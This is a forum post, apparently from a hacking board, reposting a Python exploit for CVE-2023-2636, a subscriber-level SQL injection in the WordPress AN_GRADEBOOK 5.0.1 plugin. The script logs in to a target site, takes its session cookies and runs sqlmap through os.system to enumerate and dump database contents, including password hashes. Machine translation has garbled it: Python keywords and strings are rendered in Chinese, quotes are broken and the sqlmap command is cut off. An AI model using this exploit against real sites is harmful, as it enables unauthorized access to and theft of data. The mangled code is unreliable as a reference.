H

WordPress插件AN_GRADEBOOK 5.0.1 -SQLI

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#!/usr/bin/python3
#exploit title: wordpress插件an_gradebook=5.0.1-订户+ sqli
#日期: 2023-07-26
#利用作者:卢卡斯马云惹不起马云金恩伯格
#github: https://github.com/lukinneberg/cve-2023-2636
#供应商homepage3360 https://wordpress.org/plugins/an-gradebook/
#软件Link: https://github.com/lukinneberg/cve-2023-2636/blob/main/main/an-gradebook.7z
#测试在: WordPress 6.2.2
#CVE: CVE-2023-2636
从DateTime Import DateTime
导入操作系统
导入请求
进口JSON
#用户输入:
target_ip='change_this''
target_port='80'
用户名='hacker'
密码='黑客'
横幅='''
______ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ ______
|| c ||| V || e ||| - ||| 2 ||| 0 ||| 2 |||| 3 |||| - ||| 2 |||| 6 ||| 6 ||
|| __ |||| __ ||| __ ||| __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || __ || || || || || || || || ___________________ ||
|/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ |/__ \ \ |
漏洞作者:卢卡斯马云惹不起马云金恩伯格(Lukas Kinneberg)
'''
印刷(横幅)
print('[*]启动漏洞利用AT:' + str(dateTime.now()。strftime('%H:%M3:%S')))))))))))
#Authentication:
session=requests.session()
auth_url='http://' + target_ip +':' + target_port +'/wp-login.php'
检查=session.get(auth_url)
#Header:
标头={
'host': target_ip,
'用户代理:'Mozilla/5.0(X11; Ubuntu; Linux X86_64; rv:89.0)壁虎/20100101 Firefox/89.0',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,/; q=0.8',
'Accept-Language':'DE,EN-US; q=0.7,en; q=0.3',
'接受编码:'gzip,deflate',
'content-type':'应用程序/x-www-form-urlencoded',
'Origin':'http://' + Target_ip,
'Connection':'关闭',
'升级- 不必要的requrequests':'1'
}
#body:
身体={
'log':用户名,
'PWD':密码,
'wp-submit':'登录',
'testCookie':'1'
}
auth=session.post(auth_url,headers=header,data=body)
#SQL注入(漏洞):
#生成SQLMAP的有效载荷
cookies_session=session.cookies.get_dict()
cookie=json.dumps(cookies_session)
cookie=cookie.replace(''}','')
cookie=cookie.replace('{'','')
cookie=cookie.replace('','')
cookie=cookie.replace('','')
cookie=cookie.replace(':','=')
cookie=cookie.replace(',',';')
打印('[*] SQL-Inmotity:'的有效载荷)
#在下面的target_port之后输入课程的URL路径
exploitcode_url=r'sqlmap -u'http://' + target_ip +':' + target_port + r'/wp-admin/admin-admin/admin-ajax.php?
exploitcode_risk=' - level 2-strisk 2'
exploitcode_cookie='-cookie='' + cookie +''''
#SQLMAP打印输出
打印('sqlmap options:')
打印('-a, - 所有人检索所有内容')
打印('-b, - 邦纳检索DBMS横幅')
打印(' - 电流- 用户检索DBMS当前用户')
打印(' - 电流DB检索DBMS当前数据库')
打印(' - passwords枚举dbms用户密码哈希)
打印(' - 表枚举DBMS数据库表')
打印(' - 列枚举DBMS数据库表列')
打印(' - Schema枚举DBMS架构')
打印(' - dump dump dbms数据库表条目')
打印(' - dump-all转储所有DBMS数据库表条目')
retireve_mode=input('应该使用哪个SQLMAP选项检索您的信息?')
exploitcode=exploitcode_url + exploitcode_risk + exploitcode_cookie + retireve_mode +'-p id -V 0 -V 0 -V0 -V0 -verswers='laste
OS.System(ExploitCode)
print('exploit完成at:' + str(dateTime.now()。strftime('%h:%m:%s'))))))))))))))
 
后退
顶部